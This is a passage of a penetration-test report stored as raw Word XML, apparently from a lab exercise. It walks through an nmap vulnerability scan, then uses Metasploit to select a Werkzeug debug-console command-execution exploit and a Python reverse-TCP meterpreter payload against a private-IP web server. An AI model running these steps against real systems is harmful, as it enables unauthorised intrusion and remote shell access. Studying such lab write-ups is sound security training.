        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90A7E">
        <w:t>Both http/https services run over an Apache httpd version 2.4.34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0320AC" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:t>The nmap can also be combine with script to perform vulnerability test.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4508"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w14:paraId="6ED06442" w14:textId="77777777" w:rsidTr="00B90A7E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56092413" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00B90A7E">
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37B9D295" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00B90A7E">
              <w:t>sudo nmap -sV –script=vulners -v 192.168.15.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BA338C7" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC60D6C" w14:textId="41601359" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E64F636" wp14:editId="0D6D9E56">
            <wp:extent cx="5734050" cy="2914650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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4050" cy="2914650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFDCDFC" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:t>The –script=vulners allow the nmap to scan for vulnerability, each vulnerability has its own CVE code, CVSS score, and reference link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D43003" w14:textId="12EA2FC6" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:t>Most of the vulnerability refer</w:t>
      </w:r>
      <w:r w:rsidR="00151E57">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> to the Apache service running on the Ubuntu server, Apache is well known for its vulnerabilit</w:t>
      </w:r>
      <w:r w:rsidR="00151E57">
        <w:t>ies</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> as it is widely used and new exploit</w:t>
      </w:r>
      <w:r w:rsidR="00151E57">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> are often discovered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3142B97C" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve">As discovered that the web serve used a wsgi module(first exploit) to communicate to the flask web app, and researched about the Werkzeug Debugger, the Metasploit app(in this case v6.1.14-dev) is lunched via the command </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4508"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w14:paraId="388872EC" w14:textId="77777777" w:rsidTr="00B90A7E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67D28E14" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00B90A7E">
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13A192C6" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00B90A7E">
              <w:tab/>
              <w:t>msfconsole</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65AD9C07" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="50479FA5" w14:textId="5D6727BC" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4246403F" wp14:editId="0512D8DD">
            <wp:extent cx="5734050" cy="2851150"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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4050" cy="2851150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C45461" w14:textId="2AD9C4DA" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidR="00151E57">
        <w:t xml:space="preserve">Metasploit </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t>console</w:t>
      </w:r>
      <w:r w:rsidR="00151E57">
        <w:t xml:space="preserve"> it</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> is possible to search for the exploit</w:t>
      </w:r>
      <w:r w:rsidR="00151E57">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidR="00151E57">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t>search</w:t>
      </w:r>
      <w:r w:rsidR="00151E57">
        <w:t>’ followed by</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> some keyword parameters</w:t>
      </w:r>
      <w:r w:rsidR="00151E57">
        <w:t xml:space="preserve"> around the service, application, or vulnerability you wish to exploit. In this case python.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4508"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w14:paraId="391D2705" w14:textId="77777777" w:rsidTr="00B90A7E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14E60C78" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00B90A7E">
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58791B67" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00B90A7E">
              <w:t>search python</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E6EB42C" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E"/>
    <w:p w14:paraId="6802CF27" w14:textId="430CC2D2" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve">Another key word that could have been used is Werkzeug, a list of </w:t>
      </w:r>
      <w:r w:rsidR="00151E57">
        <w:t xml:space="preserve">potential </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidR="00151E57">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> will be displayed to the user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED1FCD5" w14:textId="49A95F84" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C1B876E" wp14:editId="3494C07E">
            <wp:extent cx="5727700" cy="984250"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635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27700" cy="984250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DD6645" w14:textId="773BBDCE" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:t>Once identify</w:t>
      </w:r>
      <w:r w:rsidR="00151E57">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> the exploit desired (in this case Werkzeug Dedug Shell Command Execution on line 67)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A95EAE" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:t>Can be used with the command ‘use’ followed by the exploit/full/name or list number</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4508"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w14:paraId="123D8C1C" w14:textId="77777777" w:rsidTr="00B90A7E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CA1E51E" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00B90A7E">
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79DF9AAB" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00B90A7E">
              <w:t>use 67</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="274C621E" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="385CEE64" w14:textId="75470AE1" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:t>a default payload is automatically loaded</w:t>
      </w:r>
      <w:r w:rsidR="002962B0">
        <w:t xml:space="preserve"> by Metasploit,</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> in this case python/meterpreter/rever_tcp </w:t>
      </w:r>
      <w:r w:rsidR="002962B0">
        <w:t>which</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidR="002962B0">
        <w:t>ideal</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> for the scope of th</w:t>
      </w:r>
      <w:r w:rsidR="002962B0">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> exploit as the aim is to create a reverse tcp shell using python</w:t>
      </w:r>
      <w:r w:rsidR="002962B0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603255D5" w14:textId="58B1B705" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="002962B0" w:rsidP="00B90A7E">
      <w:r>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="00B90A7E" w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve">few </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">additional </w:t>
      </w:r>
      <w:r w:rsidR="00B90A7E" w:rsidRPr="00B90A7E">
        <w:t>options must be set before execut</w:t>
      </w:r>
      <w:r>
        <w:t>ion of</w:t>
      </w:r>
      <w:r w:rsidR="00B90A7E" w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> the exploit, to view the module, payload and option</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00B90A7E" w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> available or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> currently</w:t>
      </w:r>
      <w:r w:rsidR="00B90A7E" w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>configured,</w:t>
      </w:r>
      <w:r w:rsidR="00B90A7E" w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>use</w:t>
      </w:r>
      <w:r w:rsidR="00B90A7E" w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> the command:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4508"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w14:paraId="778FBA98" w14:textId="77777777" w:rsidTr="00B90A7E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0613AE9D" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00B90A7E">
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C1E7588" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00B90A7E">
              <w:t>show option</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5FF65167" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079DC3BF" w14:textId="5D57C7B9" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="672758EE" wp14:editId="652F297F">
            <wp:extent cx="5734050" cy="2736850"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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4050" cy="2736850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6B3C5F" w14:textId="592F61F2" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:t>The remote host is set to 192.168.15.10</w:t>
      </w:r>
      <w:r w:rsidR="002962B0">
        <w:t xml:space="preserve"> (target </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002962B0">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002962B0">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF7D504" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:t>The remote e-commerce sever uses the ssl protocol on port 433(HTTPS)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4508"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w14:paraId="46F93344" w14:textId="77777777" w:rsidTr="00B90A7E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54B3BF63" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00B90A7E">
              <w:t>Commands</w:t>
            </w:r>
            <w:r w:rsidRPr="00B90A7E">
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EC21701" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00B90A7E">
              <w:t>set rhost 192.168.15.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w14:paraId="4645A78B" w14:textId="77777777" w:rsidTr="00B90A7E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6130907E" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F2414FB" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00B90A7E">
              <w:t>set ssl true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w14:paraId="44171E13" w14:textId="77777777" w:rsidTr="00B90A7E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
